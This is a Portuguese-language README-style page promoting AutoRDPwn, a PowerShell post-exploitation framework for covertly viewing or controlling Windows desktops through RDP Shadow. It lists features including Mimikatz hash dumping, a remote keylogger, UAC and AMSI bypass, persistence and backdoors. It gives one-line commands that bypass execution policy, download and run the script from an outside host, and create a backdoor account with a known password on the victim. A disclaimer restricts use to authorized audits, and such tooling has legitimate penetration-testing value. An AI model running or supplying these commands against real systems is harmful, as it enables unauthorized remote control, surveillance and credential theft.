AutoRDPwn é um framework pós-exploração criado em Powershell, projetado principalmente para automatizar o ataque Shadowem computadores Microsoft Windows. Essa vulnerabilidade (listada como um recurso pela Microsoft) permite que um invasor remoto visualize a área de trabalho de sua vítima sem o seu consentimento e até a controle sob demanda, usando ferramentas nativas do próprio sistema operacional. Graças aos módulos adicionais, é possível obter um shell remoto através do Netcat, descarregar hashes do sistema com o Mimikatz, carregar um keylogger remoto e muito mais. Tudo isso, através de um menu completamente intuitivo em sete idiomas diferentes.Além disso, é possível usá-lo em um shell reverso por meio de uma série de parâmetros descritos na seção de uso.
Requisitos
Powershell 4.0 ou superior

Mudanças 

Versão 5.0
• Novo logotipo completamente redesenhado do zero
• Tradução completa em 7 idiomas: es, pt, de, it, ru, pt
• Execução remota através de um shell reverso com UAC e AMSI Bypass
• Suporte parcial do Linux (mais informações no guia do usuário)
• Execução remota aprimorada (a conexão com a Internet não é mais necessária na vítima)
• Nova seção disponível: backdoors e persistência
• Novo módulo disponível: Keylogger remoto
• Nova seção disponível: Escalonamento de privilégios
• Novo módulo disponível: Obter informações do sistema operacional
• Novo módulo disponível: Pesquise vulnerabilidades com o Sherlock
• Novo módulo disponível: Escalar privilégios com o PowerUp 
• Nova seção disponível: Outros Módulos 
• Novo módulo disponível: Executar um script externo 
* O restante das alterações pode ser consultado no arquivo CHANGELOG 

Use
Este aplicativo pode ser usado localmente, remotamente ou para pivô entre equipes. 
Quando usado remotamente em um shell reverso, é necessário usar os seguintes parâmetros: 
-admin / -noadmin -> Dependendo das permissões que temos, usaremos um ou outro 
-nogui -> Isso evitará carregar o menu e alguns cores, garantido a sua funcionalidade 
-lang -> Vamos escolher o nosso idioma (Inglês, Espanhol, Francês, Alemão, Italiano, Russo ou Português) 
-option-> Como com o menu, podemos escolher como lançar o ataque 
-shadow -> Vamos decidir se queremos ver ou controlar o dispositivo remoto 
-createuser -> Este parâmetro é opcional, o usuário AutoRDPwn (senha: AutoRDPwn) ser criado na máquina da vítima 
Execução local em uma linha:

powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Exemplo de execução remota em uma linha:

powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

O guia detalhado de uso pode ser encontrado no seguinte link: 
https://darkbyte.net/autordpwn-la-guia-definitiva 

Screenshots

Créditos e Reconhecimentos
Esta estrutura utiliza os seguintes scripts e ferramentas:
• Enumerador Chachi de Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System de HarmJ0y & Matt Graeber -> https: // github .com / HarmJ0y / Misc-PowerShell
• Invoque-DCOM de Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoque-MetasploitPayload do Jared Haight -> https://github.com/jaredhaight / Invoke-MetasploitPayload
• Invoke-Phant0m de Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp deNikhil “SamratAshok” Mittal -> https://github.com/samratashok/nishang
• Invoque-TheHash por Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz de Benjamin Delpy -> https : //github.com/gentilkiwi/mimikatz
• PsExec de Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper da Stas’M Corp. -> https: / /github.com/stascorp/rdpwrap
• SessionGopher de Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
E muitos mais, que não se encaixam aqui .. Obrigado a todos eles e seu excelente trabalho. 

Contato
Este software não oferece nenhum tipo de garantia. Seu uso é exclusivo para ambientes educacionais e / ou auditorias de segurança com o consentimento correspondente do cliente. Eu não sou responsável por seu uso indevido ou por qualquer dano possível causado por ele. 
Para mais informações, você pode entrar em contato através de info@darkbyte.net

Baixar AutoRDPwn